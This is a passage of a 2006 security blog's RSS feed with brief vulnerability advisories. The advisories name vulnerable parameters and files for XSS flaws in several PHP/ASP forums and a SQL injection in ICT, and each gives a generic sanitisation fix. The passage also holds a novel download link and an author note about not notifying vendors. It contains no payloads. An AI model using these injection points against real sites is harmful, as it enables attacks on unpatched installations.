/&gt;&lt;a href="http://secunia.com/advisories/16504/"&gt;Zorum Arbitrary Command Execution and SQL Injection Vulnerabilities&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.milw0rm.com/exploits/1509"&gt;Zorum forum 3.5 sql injection exploit&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115134858020805345?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/zorum-forum-35-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115132566822404225</guid><pubDate>Mon, 26 Jun 2006 12:38:00 +0000</pubDate><atom:updated>2006-06-26T14:41:08.773+02:00</atom:updated><title>Хакер (Андрей Житков)</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/blogger/725/1421/1600/xakep.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://photos1.blogger.com/blogger/725/1421/320/xakep.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Он – хакер. Гений и хулиган. Его цель – взломать банковскую сеть и стать миллионером. Для него это не более чем компьютерная игра. Но вскоре он сам становится персонажем чьей-то совсем не виртуальной игры, а его друзья и знакомые погибают от настоящего, а не виртуального оружия…&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.book-portal.info/files/zhitkov_andrei_haker.rtf.rar"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115132566822404225?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/blog-post.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115125476792849076</guid><pubDate>Sun, 25 Jun 2006 16:58:00 +0000</pubDate><atom:updated>2006-06-25T18:59:28.080+02:00</atom:updated><title>DeluxeBB &lt;=1.07 XSS vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 june 2006&lt;br /&gt;vendor:http://www.deluxebb.com/&lt;br /&gt;affected versions:1.07 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;DeluxeBB contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "subject" and "to" parameter in "pm.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115125476792849076?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/deluxebb-107-xss-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115125341287369972</guid><pubDate>Sun, 25 Jun 2006 16:35:00 +0000</pubDate><atom:updated>2006-12-11T00:43:31.180+01:00</atom:updated><title>ICT - Infinite Core Technologies vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 june 2006&lt;br /&gt;vendor:http://www.infinitecore.com/&lt;br /&gt;affected versions:1.0 Gold and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;ICT contains a flaw that allows a remote sql injection attacks.Input passed to the "post" parameter in "index.php" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115125341287369972?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/ict-infinite-core-technologies-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115125035347020551</guid><pubDate>Sun, 25 Jun 2006 15:45:00 +0000</pubDate><atom:updated>2006-06-25T17:45:53.870+02:00</atom:updated><title>OpenForum XSS vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 june 2006&lt;br /&gt;vendor:www.2enetworx.com/dev/projects/openforum.asp&lt;br /&gt;affected versions:1.2 Beta and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;OpenForum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "ofdisp" and "ofmsgid" parameter in "openforum.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115125035347020551?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/openforum-xss-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115119956960577518</guid><pubDate>Sun, 25 Jun 2006 01:38:00 +0000</pubDate><atom:updated>2007-03-31T00:28:47.080+02:00</atom:updated><title>GL-SH Deaf Forum XSS vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 june 2006&lt;br /&gt;vendor:http://www.frank-karau.de/&lt;br /&gt;affected versions:6.4.3 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;GL-SH Deaf Forum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "sort" parameter in "show.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115119956960577518?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/gl-sh-deaf-forum-xss-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115118984698597813</guid><pubDate>Sat, 24 Jun 2006 22:57:00 +0000</pubDate><atom:updated>2006-06-26T18:19:01.730+02:00</atom:updated><title>phpQLAdmin vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 june 2006&lt;br /&gt;vendor:http://phpqladmin.com&lt;br /&gt;affected versions:2.2.x and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;phpQLAdmin contains multiple flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "domain" parameter in "user_add.php" and "unit_add.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115118984698597813?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/phpqladmin-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115117444417044503</guid><pubDate>Sat, 24 Jun 2006 18:40:00 +0000</pubDate><atom:updated>2006-06-24T20:40:44.340+02:00</atom:updated><title>XennoBB XSS vuln.</title><description>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 24 june 2006&lt;br /&gt;vendor:http://www.xennobb.com/&lt;br /&gt;affected versions:1.0.5 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;XennoBB contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "tid" parameter in "messages.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115117444417044503?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/xennobb-xss-vuln.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-15362515.post-115115352633044516</guid><pubDate>Sat, 24 Jun 2006 12:23:00 +0000</pubDate><atom:updated>2006-06-24T23:11:14.030+02:00</atom:updated><title>btw ...</title><description>Somebody was asked to me why coments on this blog is "censured" - moderated.&lt;br /&gt;Every day tehere are almost 50 spammers with comercial spam, like credit loans  and other shit...im not suprissed cauz many of my reports/advisories are ecommerce webaplications. &lt;br /&gt;To fight with spammers ..hm... if it was one ..it will be not so dificult , but ... &lt;br /&gt;Any way spam sucks... &lt;br /&gt;&lt;br /&gt;In my last post i told that i will not have time to publish advisories and report about unsecured systems and i told that i will post 10-15 and thats will be end and other guys or VietMafia will continue contribute blog with advisories. &lt;br /&gt;IN place of 10-15 is more than 50 became , cauz VietMafia didnt .... So for me its to easy to do nothin, thats why i didnt stop..even my time is limited . I will continue so long as i can. &lt;br /&gt;&lt;br /&gt;And again there is some developers (2 from 50) who are shocked that i didnt contacted them and reported about vuln. &lt;br /&gt;I regullary try to do this in every 100 advisory i try, so no succesfull result till now, so why i must? &lt;br /&gt;So i think that we stay in one point, i can do only my job wih success if you do mistakes, if you dont i can do my job.&lt;br /&gt;Everyone have mistakes  and im not better than you , its just my job to find out some mistakes. &lt;br /&gt;In that point i wanna also say thanks to Secunia and OSVDB guys for support. &lt;br /&gt;&lt;br /&gt;And till now i didnt wrote article about wich i had promissed to write,cauz im waiting when cembo will complete PVS-Pridels Vuln Scanner , if its will be great tool my meaning  can change and content of article to, thats why i better wait. &lt;br /&gt;And before it will be published i will try as alternative for my fingers... :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115115352633044516?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pridels0.blogspot.com/2006/06/btw.html</link><author>noreply@blogger.com (r0t)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item></channel></rss>